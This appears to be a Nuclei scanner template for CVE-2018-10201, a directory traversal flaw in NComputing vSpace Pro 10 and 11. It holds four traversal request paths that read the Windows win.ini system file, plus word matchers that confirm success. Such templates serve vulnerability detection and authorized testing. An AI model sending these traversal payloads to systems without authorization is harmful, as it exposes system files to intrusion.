41 lines
1.3 KiB
YAML
41 lines
1.3 KiB
YAML
id: CVE-2018-10201
|
|
|
|
info:
|
|
name: Ncomputing vSPace Pro 10 and 11 - Directory Traversal
|
|
author: 0x_akoko
|
|
severity: high
|
|
description: Ncomputing vSpace Pro versions 10 and 11 suffer from a directory traversal vulnerability.
|
|
reference:
|
|
- https://packetstormsecurity.com/files/147303/Ncomputing-vSPace-Pro-10-11-Directory-Traversal.html
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2018-10201
|
|
- http://www.kwell.net/kwell_blog/?p=5199
|
|
- https://www.kwell.net/kwell/index.php?option=com_newsfeeds&view=newsfeed&id=15&Itemid=173&lang=es
|
|
classification:
|
|
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
|
|
cvss-score: 7.5
|
|
cve-id: CVE-2018-10201
|
|
cwe-id: CWE-22
|
|
tags: cve2018,ncomputing,lfi,packetstorm,cve
|
|
metadata:
|
|
max-request: 4
|
|
|
|
http:
|
|
- method: GET
|
|
path:
|
|
- '{{BaseURL}}/.../.../.../.../.../.../.../.../.../windows/win.ini'
|
|
- '{{BaseURL}}/...\...\...\...\...\...\...\...\...\windows\win.ini'
|
|
- '{{BaseURL}}/..../..../..../..../..../..../..../..../..../windows/win.ini'
|
|
- '{{BaseURL}}/....\....\....\....\....\....\....\....\....\windows\win.ini'
|
|
|
|
stop-at-first-match: true
|
|
matchers:
|
|
- type: word
|
|
part: body
|
|
words:
|
|
- "bit app support"
|
|
- "fonts"
|
|
- "extensions"
|
|
condition: and
|
|
|
|
# Enhanced by mp on 2022/04/26
|